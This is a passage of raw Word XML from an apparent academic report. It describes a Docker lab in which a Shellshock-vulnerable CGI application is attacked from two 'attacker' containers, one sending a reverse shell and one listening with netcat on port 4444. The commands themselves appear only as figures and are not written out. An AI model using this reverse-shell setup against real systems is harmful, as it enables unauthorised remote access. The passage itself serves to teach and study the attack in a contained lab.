    <w:p w14:paraId="420E2C5F" w14:textId="5BF9AA8A" w:rsidR="003F4F4A" w:rsidRDefault="009B4DFF" w:rsidP="003F4F4A">
      <w:r>
        <w:t>An application</w:t>
      </w:r>
      <w:r w:rsidR="00054BD5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD41C9">
        <w:t xml:space="preserve">is downloaded from the public Docker </w:t>
      </w:r>
      <w:r w:rsidR="001C417E">
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="00DD41C9">
        <w:t>ub repository</w:t>
      </w:r>
      <w:r w:rsidR="001C417E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00DD41C9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00634223">
        <w:t>which is vulnerable to shellshock attacks.</w:t>
      </w:r>
      <w:r w:rsidR="00540EBB">
        <w:t xml:space="preserve"> The container to run this application is </w:t>
      </w:r>
      <w:r w:rsidR="00D0418B">
        <w:t xml:space="preserve">started using the Docker commands shown in figure 49. </w:t>
      </w:r>
      <w:r w:rsidR="00C04326">
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidR="009775C7">
        <w:t>is particular container exposes port 80 and ma</w:t>
      </w:r>
      <w:r w:rsidR="00DB185A">
        <w:t>ps</w:t>
      </w:r>
      <w:r w:rsidR="004B58A5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00803008">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="004B58A5">
        <w:t>port 8080 on the host</w:t>
      </w:r>
      <w:r w:rsidR="0018447F">
        <w:t xml:space="preserve">; and thus, </w:t>
      </w:r>
      <w:r w:rsidR="00B10B5A">
        <w:t>external host</w:t>
      </w:r>
      <w:r w:rsidR="0018447F">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00B10B5A">
        <w:t xml:space="preserve"> can access the application via </w:t>
      </w:r>
      <w:r w:rsidR="00DB185A">
        <w:t>port 8080</w:t>
      </w:r>
      <w:r w:rsidR="0018447F">
        <w:t xml:space="preserve">, as shown in figure </w:t>
      </w:r>
      <w:r w:rsidR="00B164C6">
        <w:t>50</w:t>
      </w:r>
      <w:r w:rsidR="00DB185A">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00614D46">
        <w:t xml:space="preserve"> Also, the container starts with a name exploit</w:t>
      </w:r>
      <w:r w:rsidR="000C3374">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006F4775">
        <w:t xml:space="preserve"> In addition, the application is created using CGI</w:t>
      </w:r>
      <w:r w:rsidR="001C6C16">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001C6C16">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">script under the /usr/lib/cgi-bin directory on the </w:t>
      </w:r>
      <w:r w:rsidR="003B5EBA">
        <w:t>victim container.</w:t>
      </w:r>
      <w:r w:rsidR="001203EE">
        <w:t xml:space="preserve"> CGI is </w:t>
      </w:r>
      <w:r w:rsidR="00B8531C">
        <w:t>an executable program</w:t>
      </w:r>
      <w:r w:rsidR="00D871D4">
        <w:t>, usually</w:t>
      </w:r>
      <w:r w:rsidR="00C4667A">
        <w:t xml:space="preserve"> used</w:t>
      </w:r>
      <w:r w:rsidR="00D871D4">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00951C78">
        <w:t xml:space="preserve">handle user requests and </w:t>
      </w:r>
      <w:r w:rsidR="00C4667A">
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidR="00657E7A">
        <w:t>processing data on a web server</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1700044425"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00D26AF0">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00D26AF0">
            <w:instrText xml:space="preserve"> CITATION Apa21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00D26AF0">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[89]</w:t>
          </w:r>
          <w:r w:rsidR="00D26AF0">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00657E7A">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6F3B6A" w14:textId="7AB1CF12" w:rsidR="00047F24" w:rsidRDefault="008D1E8C" w:rsidP="002935ED">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6257A6A1" wp14:editId="1A607FFD">
            <wp:extent cx="5731510" cy="546100"/>
            <wp:effectExtent l="0" t="0" r="254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546100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5FF8EB" w14:textId="58604333" w:rsidR="00D15973" w:rsidRDefault="00D15973" w:rsidP="006B5D2F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="128" w:name="_Toc86858640"/>
      <w:r w:rsidRPr="006B5D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="006B5D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="006B5D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="006B5D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>49</w:t>
      </w:r>
      <w:r w:rsidRPr="006B5D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="006B5D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0020719A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="002D6DF9" w:rsidRPr="006B5D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tarting the container for the application.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="128"/>
    </w:p>
    <w:p w14:paraId="7AB829A7" w14:textId="034DB981" w:rsidR="006B5D2F" w:rsidRPr="006B5D2F" w:rsidRDefault="00BD79FA" w:rsidP="006B5D2F">
      <w:r>
        <w:t xml:space="preserve">The screenshot below shows </w:t>
      </w:r>
      <w:r w:rsidR="008C1EFE">
        <w:t xml:space="preserve">the application is </w:t>
      </w:r>
      <w:r w:rsidR="00A23658">
        <w:t>accessed from the host machine via port 8080.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDCA979" w14:textId="562C4277" w:rsidR="00B164C6" w:rsidRDefault="00B164C6" w:rsidP="002935ED">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2683838B" wp14:editId="0927DA09">
            <wp:extent cx="4362450" cy="2375520"/>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368357" cy="2378737"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFEA625" w14:textId="7A599A15" w:rsidR="002D6DF9" w:rsidRDefault="002D6DF9" w:rsidP="006B5D2F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="129" w:name="_Toc86858641"/>
      <w:r w:rsidRPr="006B5D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="006B5D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="006B5D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="006B5D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
      <w:r w:rsidRPr="006B5D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="006B5D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0020719A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="006B5D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ccessing the </w:t>
      </w:r>
      <w:r w:rsidR="006B5D2F" w:rsidRPr="006B5D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>application via the mapped port.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="129"/>
    </w:p>
    <w:p w14:paraId="5173D009" w14:textId="3BAD8D02" w:rsidR="0059192E" w:rsidRDefault="005E33CF" w:rsidP="0059192E">
      <w:r>
        <w:t xml:space="preserve">In addition, two alpine based containers are </w:t>
      </w:r>
      <w:r w:rsidR="00712356">
        <w:t xml:space="preserve">used to exploit the vulnerability of the </w:t>
      </w:r>
      <w:r w:rsidR="00F068E8">
        <w:t>application.</w:t>
      </w:r>
      <w:r w:rsidR="005F228B">
        <w:t xml:space="preserve"> The first container </w:t>
      </w:r>
      <w:r w:rsidR="0061231D">
        <w:t xml:space="preserve">is used to execute </w:t>
      </w:r>
      <w:r w:rsidR="00D10C73">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00F92589">
        <w:t>reverse shell</w:t>
      </w:r>
      <w:r w:rsidR="0061231D">
        <w:t xml:space="preserve"> command</w:t>
      </w:r>
      <w:r w:rsidR="00D10C73">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="0061231D">
        <w:t xml:space="preserve"> and the second </w:t>
      </w:r>
      <w:r w:rsidR="00B6445A">
        <w:t>uses</w:t>
      </w:r>
      <w:r w:rsidR="002722B5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B6445A">
        <w:t xml:space="preserve">netcat tool to listen </w:t>
      </w:r>
      <w:r w:rsidR="00D10C73">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00B6445A">
        <w:t xml:space="preserve">any incoming </w:t>
      </w:r>
      <w:r w:rsidR="009B679F">
        <w:t>packets on port 4444.</w:t>
      </w:r>
      <w:r w:rsidR="00160A00">
        <w:t xml:space="preserve"> Also, both containers </w:t>
      </w:r>
      <w:r w:rsidR="00F56568">
        <w:t>are launched in interactive mode</w:t>
      </w:r>
      <w:r w:rsidR="00836F7E">
        <w:t xml:space="preserve"> with the capabilities to execute shell commands.</w:t>
      </w:r>
      <w:r w:rsidR="006E26CB">
        <w:t xml:space="preserve"> The first container is </w:t>
      </w:r>
      <w:r w:rsidR="009B251B">
        <w:t xml:space="preserve">named Attacker1, while the second one </w:t>
      </w:r>
      <w:r w:rsidR="007F0D96">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="009B251B">
        <w:t xml:space="preserve">Attacker2. Figure </w:t>
      </w:r>
      <w:r w:rsidR="007B4C0B">
        <w:t xml:space="preserve">51 illustrates the Docker commands used to </w:t>
      </w:r>
      <w:r w:rsidR="00B024C0">
        <w:t xml:space="preserve">run </w:t>
      </w:r>
      <w:r w:rsidR="007169A9">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00B024C0">
        <w:t>Attacker2 container.</w:t>
      </w:r>
      <w:r w:rsidR="00A2005D">
        <w:t xml:space="preserve"> Simil</w:t>
      </w:r>
      <w:r w:rsidR="00F43460">
        <w:t xml:space="preserve">arly, the </w:t>
      </w:r>
      <w:r w:rsidR="007A1462">
        <w:t>other</w:t>
      </w:r>
      <w:r w:rsidR="00F43460">
        <w:t xml:space="preserve"> container is </w:t>
      </w:r>
      <w:r w:rsidR="007A1462">
        <w:t xml:space="preserve">started with </w:t>
      </w:r>
      <w:r w:rsidR="00A50E71">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="0004107F">
        <w:t xml:space="preserve"> name Attacker1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1AFF05" w14:textId="5ACAE719" w:rsidR="007169A9" w:rsidRDefault="007169A9" w:rsidP="007169A9">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FD91429" wp14:editId="7D1F5A21">
            <wp:extent cx="5041356" cy="1187450"/>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041356" cy="1187450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0275DB16" w14:textId="4E5409EF" w:rsidR="00D97597" w:rsidRDefault="009E40F6" w:rsidP="00DF3B77">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="130" w:name="_Toc86858642"/>
      <w:r w:rsidRPr="009E40F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="009E40F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="009E40F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="009E40F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>51</w:t>
      </w:r>
      <w:r w:rsidRPr="009E40F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009E40F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Attacker2 container.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="130"/>
    </w:p>
    <w:p w14:paraId="5DAF8C71" w14:textId="3C06E1D4" w:rsidR="00BD137F" w:rsidRDefault="00BD137F" w:rsidP="00BD137F">
      <w:r>
        <w:t>The output of docker ps c</w:t>
      </w:r>
      <w:r w:rsidR="00D620A2">
        <w:t xml:space="preserve">ommand in figure 52 shows that all </w:t>
      </w:r>
      <w:r w:rsidR="00094E13">
        <w:t xml:space="preserve">the running </w:t>
      </w:r>
      <w:r w:rsidR="00D620A2">
        <w:t>containers</w:t>
      </w:r>
      <w:r w:rsidR="001000EB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1253FC" w14:textId="77777777" w:rsidR="001000EB" w:rsidRPr="00BD137F" w:rsidRDefault="001000EB" w:rsidP="00BD137F"/>
    <w:p w14:paraId="6FE831AB" w14:textId="2D2CEB46" w:rsidR="00D97597" w:rsidRDefault="00D97597" w:rsidP="00D97597">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A807C28" wp14:editId="28DFC693">
            <wp:extent cx="5168900" cy="908251"/>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168900" cy="908251"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="015B4BC0" w14:textId="1559E4DB" w:rsidR="00A61F06" w:rsidRDefault="001000EB" w:rsidP="00A61F06">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="131" w:name="_Toc86858643"/>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>52</w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: All running containers.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="131"/>
    </w:p>
    <w:p w14:paraId="0B54CFD4" w14:textId="7BB00F8C" w:rsidR="00A61F06" w:rsidRPr="00A61F06" w:rsidRDefault="00AB1A95" w:rsidP="00A61F06">
      <w:r>
        <w:t xml:space="preserve">The containers are </w:t>
      </w:r>
      <w:r w:rsidR="0063166A">
        <w:t xml:space="preserve">connected to the same network bridge. Figure 53 </w:t>
      </w:r>
      <w:r w:rsidR="00431658">
        <w:t>shows the containers</w:t>
      </w:r>
      <w:r w:rsidR="00DD40C1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00522FDB">
        <w:t>are using their default IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA7924F" w14:textId="43C266EF" w:rsidR="00A61F06" w:rsidRDefault="00A61F06" w:rsidP="00A61F06">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BEA60C7" wp14:editId="1D665F8D">
            <wp:extent cx="5007893" cy="276860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07893" cy="2768600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F3CA59" w14:textId="1F826947" w:rsidR="00045E2A" w:rsidRPr="00045E2A" w:rsidRDefault="00045E2A" w:rsidP="00045E2A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="132" w:name="_Toc86858644"/>
      <w:r w:rsidRPr="00045E2A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00045E2A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00045E2A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00045E2A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
